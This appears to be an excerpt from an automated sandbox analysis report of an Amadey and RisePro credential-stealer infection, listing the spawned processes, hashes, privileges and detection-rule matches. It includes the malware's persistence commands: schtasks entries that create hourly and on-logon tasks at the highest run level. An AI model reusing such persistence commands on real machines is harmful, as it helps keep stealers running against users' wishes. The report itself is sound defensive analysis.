                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:14
                                                                                                                                                                                                                                      Start time:03:29:10
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1000054001\amert.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1000054001\amert.exe"
                                                                                                                                                                                                                                      Imagebase:0x360000
                                                                                                                                                                                                                                      File size:1'905'152 bytes
                                                                                                                                                                                                                                      MD5 hash:339020815B65530333BF2DDC928AC867
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000E.00000003.2792595641.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                      • Detection: 43%, Virustotal, Browse
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:15
                                                                                                                                                                                                                                      Start time:03:29:13
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Imagebase:0x70000
                                                                                                                                                                                                                                      File size:1'905'152 bytes
                                                                                                                                                                                                                                      MD5 hash:339020815B65530333BF2DDC928AC867
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000F.00000003.2831581300.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000F.00000002.2880613801.0000000000071000.00000040.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                      • Detection: 43%, Virustotal, Browse
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:16
                                                                                                                                                                                                                                      Start time:03:29:14
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe"
                                                                                                                                                                                                                                      Imagebase:0xca0000
                                                                                                                                                                                                                                      File size:1'166'336 bytes
                                                                                                                                                                                                                                      MD5 hash:FB666C3917F960FD67DF0C2C8829D77F
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                      • Detection: 33%, Virustotal, Browse
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:17
                                                                                                                                                                                                                                      Start time:03:29:14
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                                                                                                                                                                                                                                      Imagebase:0x7ff715980000
                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:18
                                                                                                                                                                                                                                      Start time:03:29:15
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                      Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                      File size:55'320 bytes
                                                                                                                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:19
                                                                                                                                                                                                                                      Start time:03:29:15
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
                                                                                                                                                                                                                                      Imagebase:0x7ff715980000
                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:20
                                                                                                                                                                                                                                      Start time:03:29:19
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe"
                                                                                                                                                                                                                                      Imagebase:0xaa0000
                                                                                                                                                                                                                                      File size:2'295'808 bytes
                                                                                                                                                                                                                                      MD5 hash:52257E8159B53FFB0F4E7CAE516DC107
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000014.00000003.2883884113.0000000005380000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000014.00000002.3269708121.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000014.00000003.2990613852.0000000007EE5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000014.00000002.3280096095.0000000007EE5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                      • Detection: 51%, Virustotal, Browse
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:22
                                                                                                                                                                                                                                      Start time:03:29:22
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                                                                      Imagebase:0xf00000
                                                                                                                                                                                                                                      File size:187'904 bytes
                                                                                                                                                                                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:23
                                                                                                                                                                                                                                      Start time:03:29:22
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:24
                                                                                                                                                                                                                                      Start time:03:29:22
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                                                                                                      Imagebase:0xf00000
                                                                                                                                                                                                                                      File size:187'904 bytes
                                                                                                                                                                                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:25
                                                                                                                                                                                                                                      Start time:03:29:22
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:26
                                                                                                                                                                                                                                      Start time:03:29:22
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5540 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
                                                                                                                                                                                                                                      Imagebase:0x7ff715980000
                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:27
                                                                                                                                                                                                                                      Start time:03:29:22
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5660 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
                                                                                                                                                                                                                                      Imagebase:0x7ff715980000
                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:28
                                                                                                                                                                                                                                      Start time:03:29:23
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      Imagebase:0x890000
                                                                                                                                                                                                                                      File size:2'295'808 bytes
                                                                                                                                                                                                                                      MD5 hash:52257E8159B53FFB0F4E7CAE516DC107
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000001C.00000003.2928548272.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000001C.00000002.3251490227.0000000007C50000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000001C.00000002.3244160511.0000000000891000.00000040.00000001.01000000.00000015.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                      • Detection: 51%, Virustotal, Browse
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:29
                                                                                                                                                                                                                                      Start time:03:29:23
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      Imagebase:0x890000
                                                                                                                                                                                                                                      File size:2'295'808 bytes
                                                                                                                                                                                                                                      MD5 hash:52257E8159B53FFB0F4E7CAE516DC107
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000001D.00000002.3261208378.0000000007DEF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000001D.00000003.3072924932.0000000007DEF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000001D.00000002.3252023529.0000000000891000.00000040.00000001.01000000.00000015.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000001D.00000003.3071931619.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000001D.00000002.3260532533.0000000007940000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000001D.00000003.3072820312.0000000007DEC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000001D.00000003.3072419404.0000000007DEC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000001D.00000003.2928357410.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:30
                                                                                                                                                                                                                                      Start time:03:29:24
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
                                                                                                                                                                                                                                      Imagebase:
                                                                                                                                                                                                                                      File size:2'962'432 bytes
                                                                                                                                                                                                                                      MD5 hash:F854143C49C4D2FA4CF73BAB97BA8D3A
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:31
                                                                                                                                                                                                                                      Start time:03:29:27
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe"
                                                                                                                                                                                                                                      Imagebase:0xca0000
                                                                                                                                                                                                                                      File size:1'166'336 bytes
                                                                                                                                                                                                                                      MD5 hash:FB666C3917F960FD67DF0C2C8829D77F
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:32
                                                                                                                                                                                                                                      Start time:03:29:28
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                                                                                                                                                                                                                                      Imagebase:0x7ff715980000
                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:33
                                                                                                                                                                                                                                      Start time:03:29:29
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1636,i,5624198576768077496,445941079671464976,262144 /prefetch:8
                                                                                                                                                                                                                                      Imagebase:0x7ff715980000
                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:34
                                                                                                                                                                                                                                      Start time:03:29:29
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3632 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
                                                                                                                                                                                                                                      Imagebase:0x7ff715980000
                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:36
                                                                                                                                                                                                                                      Start time:03:29:35
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe"
                                                                                                                                                                                                                                      Imagebase:0xaa0000
                                                                                                                                                                                                                                      File size:2'295'808 bytes
                                                                                                                                                                                                                                      MD5 hash:52257E8159B53FFB0F4E7CAE516DC107
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000024.00000003.3049065543.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000024.00000002.3145142996.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:38
                                                                                                                                                                                                                                      Start time:03:29:36
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5596 -s 2132
                                                                                                                                                                                                                                      Imagebase:0x120000
                                                                                                                                                                                                                                      File size:483'680 bytes
                                                                                                                                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:39
                                                                                                                                                                                                                                      Start time:03:29:36
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3872 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
                                                                                                                                                                                                                                      Imagebase:0x7ff715980000
                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:42
                                                                                                                                                                                                                                      Start time:03:29:42
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 2052
                                                                                                                                                                                                                                      Imagebase:0x120000
                                                                                                                                                                                                                                      File size:483'680 bytes
                                                                                                                                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:44
                                                                                                                                                                                                                                      Start time:03:29:42
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3436 -s 1948
                                                                                                                                                                                                                                      Imagebase:0x120000
                                                                                                                                                                                                                                      File size:483'680 bytes
                                                                                                                                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:45
                                                                                                                                                                                                                                      Start time:03:29:44
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
                                                                                                                                                                                                                                      Imagebase:0x370000
